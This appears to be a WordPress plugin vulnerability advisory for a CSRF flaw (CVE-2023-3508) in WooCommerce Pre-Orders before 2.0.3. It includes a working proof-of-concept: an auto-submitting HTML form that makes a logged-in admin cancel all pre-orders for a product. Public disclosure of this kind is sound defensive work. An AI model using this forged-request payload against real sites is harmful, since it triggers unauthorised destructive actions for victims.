WordPress Plugin Vulnerabilities

WooCommerce Pre-Orders < 2.0.3 - Unauthorised Actions via CSRF

Description

The plugin has a flawed CSRF check when processing its tab actions, which could allow attackers to make logged in admins email pre-orders customer, change the released date, mark all pre-orders of a specific product as complete or cancel via CSRF attacks

Proof of Concept

Make a logged in admin open an HTML page with the form below (this will cancel all pre-orders for the product with ID 777)

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wc_pre_orders&tab=actions" method="POST">
        <input type="text" name="wc_pre_orders_action" value="cancel">
        <input type="text" name="wc_pre_orders_action_product" value="777">
        <input type="submit" value="submit">
    </form>
</body>

Affects Plugins

Plugin icon
woocommerce-pre-orders
Fixed in 2.0.3

References

CVE
CVE-2023-3508

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
064c7acb-db57-4537-8a6d-32f7ea31c738

Timeline

Publicly Published
2023-07-10 (about 4 months ago)
Added
2023-07-10 (about 4 months ago)
Last Updated
2023-07-10 (about 4 months ago)

Other

Published
Title
Published
2022-09-26
Title
wpForo Forum < 2.0.6 - Topic Deletion via CSRF
Published
2023-04-18
Title
Clock In Portal <= 2.1 - Designation Deletion via CSRF
Published
2021-06-30
Title
YITH Request a Quote for WooCommerce < 1.6.4 - Unauthorised AJAX call via CSRF
Published
2023-09-28
Title
Events Rich Snippets for Google <= 1.8 - Cross-Site Request Forgery to Arbitrary Options Update
Published
2022-07-05
Title
FreeMind WP Browser <= 1.2 - Stored Cross-Site Scripting via CSRF